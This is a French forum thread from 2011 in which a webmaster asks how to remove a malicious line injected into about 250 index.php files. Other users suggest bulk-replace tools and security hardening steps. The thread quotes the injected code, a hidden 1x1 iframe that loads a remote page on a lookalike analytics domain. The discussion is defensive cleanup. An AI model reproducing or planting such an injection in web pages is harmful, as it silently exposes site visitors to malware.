attaque logiciel malveillant javascript dans fichier

nouni600 · 20/01/2011, 03h09

Salut à tous,

J'ai vu que avast bloqué l'accès à mes sites à cause d'un logiciel malveillant.
J'ai donc changé mes mots de passe et j'ai envoyé mes fichiers de mon serveur vers mon Pc pour faire une analyse avec Avast.

A la fin j'ai plus de 250 fichies infectés. Ce sont quasiment tous des index.php et la ligne de code ajouté est :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

<!-- counter --><script language=javascript>status=location;document.write('<iframe src="h**p://analyticgoogle.com/stats/xtjsbwcvhokqdpav.php" width="1" height="1" frameborder="0"></iframe>');</script><!-- counter -->

(j'ai remplacé "tt" par "**" pour éviter de faire un lien)

Je voulais savoir si il existe un moyen d'enlever cette ligne de tous mes fichiers rapidement ou si je dois le faire manuellement fichier par fichier??
J'ai tenté une réparation avec avast mais cela ne marche pas. Remplacer tous les fichiers par les originaux me prendrait également pas mal de temps je crois.

Merci d'avance pour votre aide

tho.feron · 21/01/2011, 12h59

Bonjour,

Pour remplacer un texte dans plusieurs fichiers, tu trouveras probablement ton bonheur sur ces sites :
http://membres.multimania.fr/mulligan/txtrpl.htm : un utilitaire pouvant tourner sur Windows
http://pwet.fr/blog/remplacer_du_tex...s_des_dossiers : sur Linux (ou autre Unix-like)

Je vous conseille quand même de réaliser un audit de sécurité pour s'assurer que la vulnérabilité ayant été utilisée pour modifier vos fichiers ne sera pas ré-exploitée.

Cordialement,
Thomas Feron de Backsmash

christele_r · 25/01/2011, 09h31

Bonjour,
Il ne faut pas rêver, il faudra nettoyer a la main et 250 fichiers c'est rien a faire !
Par contre la source de ta faille c'est autre chose.
Je te signales quelques points

1) Fais changer ton login FTP de suite
2) Contrôles que tout tes répertoires sont au moins 0755
3) Contrôles que tout tes fichiers sont au moins 0644
4) repasses en revue tes contrôles des POST GET FILES UPLOAD etc...
5) sécurises tes includes avec un jeton
6) sécurises tout Mysql y compris login a changer
7) Mets des index bloquants dans tout tes répertoires.
8) Recherches en détail tout fichier inconnu de toi !

laurentSc · 25/02/2011, 08h54

J'imagine une solution pour le faire automatiquement :

mettre ces fichiers sur FTP

en PHP, les ouvrir via une boucle (et fopen pour les ouvrir)

sur chacun, faire le remplacement (fwrite pour écrire dans le fichier)

refermer chaque fichier (fclose), puis remettre tout sur le disque dur

Eric2a · 25/02/2011, 23h47

Salut,

+1 Mauriser

9) Scanner ton PC (et pas uniquement les fichiers provenant du serveur).

20/01/2011, 03h09	#1
nouni600 Invité de passage Inscription : janvier 2011 Messages : 1 Détails du profil Informations forums : Inscription : janvier 2011 Messages : 1 Points : 0 Points : 0	attaque logiciel malveillant javascript dans fichier Salut à tous, J'ai vu que avast bloqué l'accès à mes sites à cause d'un logiciel malveillant. J'ai donc changé mes mots de passe et j'ai envoyé mes fichiers de mon serveur vers mon Pc pour faire une analyse avec Avast. A la fin j'ai plus de 250 fichies infectés. Ce sont quasiment tous des index.php et la ligne de code ajouté est : Code : Sélectionner tout - Visualiser dans une fenêtre à part <!-- counter --><script language=javascript>status=location;document.write('<iframe src="hp://analyticgoogle.com/stats/xtjsbwcvhokqdpav.php" width="1" height="1" frameborder="0"></iframe>');</script><!-- counter --> (j'ai remplacé "tt" par "" pour éviter de faire un lien) Je voulais savoir si il existe un moyen d'enlever cette ligne de tous mes fichiers rapidement ou si je dois le faire manuellement fichier par fichier?? J'ai tenté une réparation avec avast mais cela ne marche pas. Remplacer tous les fichiers par les originaux me prendrait également pas mal de temps je crois. Merci d'avance pour votre aide
	00

25/01/2011, 09h31	#3
christele_r Membre chevronné Christele Inscription : novembre 2009 Messages : 661 Détails du profil Informations personnelles : Nom : Christele Âge : 39 Localisation : France Informations professionnelles : Secteur : High Tech - Multimédia et Internet Informations forums : Inscription : novembre 2009 Messages : 661 Points : 690 Points : 690	Bonjour, Il ne faut pas rêver, il faudra nettoyer a la main et 250 fichiers c'est rien a faire ! Par contre la source de ta faille c'est autre chose. Je te signales quelques points 1) Fais changer ton login FTP de suite 2) Contrôles que tout tes répertoires sont au moins 0755 3) Contrôles que tout tes fichiers sont au moins 0644 4) repasses en revue tes contrôles des POST GET FILES UPLOAD etc... 5) sécurises tes includes avec un jeton 6) sécurises tout Mysql y compris login a changer 7) Mets des index bloquants dans tout tes répertoires. 8) Recherches en détail tout fichier inconnu de toi !
	10

25/02/2011, 08h54	#4
laurentSc Débutant Laurent Webmaster Inscription : octobre 2006 Messages : 2 873 Détails du profil Informations personnelles : Nom : Laurent Âge : 48 Localisation : France, Isère (Rhône Alpes) Informations professionnelles : Activité : Webmaster Secteur : Industrie Informations forums : Inscription : octobre 2006 Messages : 2 873 Points : 1 320 Points : 1 320	J'imagine une solution pour le faire automatiquement : mettre ces fichiers sur FTP en PHP, les ouvrir via une boucle (et fopen pour les ouvrir) sur chacun, faire le remplacement (fwrite pour écrire dans le fichier) refermer chaque fichier (fclose), puis remettre tout sur le disque dur
	00

25/02/2011, 23h47	#5
Eric2a Membre Expert Eric Garidacci Inscription : septembre 2005 Messages : 1 057 Détails du profil Informations personnelles : Nom : Eric Garidacci Âge : 41 Informations forums : Inscription : septembre 2005 Messages : 1 057 Points : 1 564 Points : 1 564	Salut, +1 Mauriser 9) Scanner ton PC (et pas uniquement les fichiers provenant du serveur). __________________ N'oubliez pas le vote des messages utiles ainsi que le Tag [Résolu]. Mon Site Web : Corse - Actualité, Météo, Vidéos, Logiciels, ...
	00

21/01/2011, 12h59	#2
tho.feron Membre actif Thomas Feron Chef d'entreprise Inscription : novembre 2010 Messages : 94 Détails du profil Informations personnelles : Nom : Thomas Feron Localisation : Belgique Informations professionnelles : Activité : Chef d'entreprise Secteur : High Tech - Multimédia et Internet Informations forums : Inscription : novembre 2010 Messages : 94 Points : 164 Points : 164	Bonjour, Pour remplacer un texte dans plusieurs fichiers, tu trouveras probablement ton bonheur sur ces sites : http://membres.multimania.fr/mulligan/txtrpl.htm : un utilitaire pouvant tourner sur Windows http://pwet.fr/blog/remplacer_du_tex...s_des_dossiers : sur Linux (ou autre Unix-like) Je vous conseille quand même de réaliser un audit de sécurité pour s'assurer que la vulnérabilité ayant été utilisée pour modifier vos fichiers ne sera pas ré-exploitée. Cordialement, Thomas Feron de Backsmash
	00

Outils de la discussion
Afficher une version imprimable Envoyer un lien vers cette page par email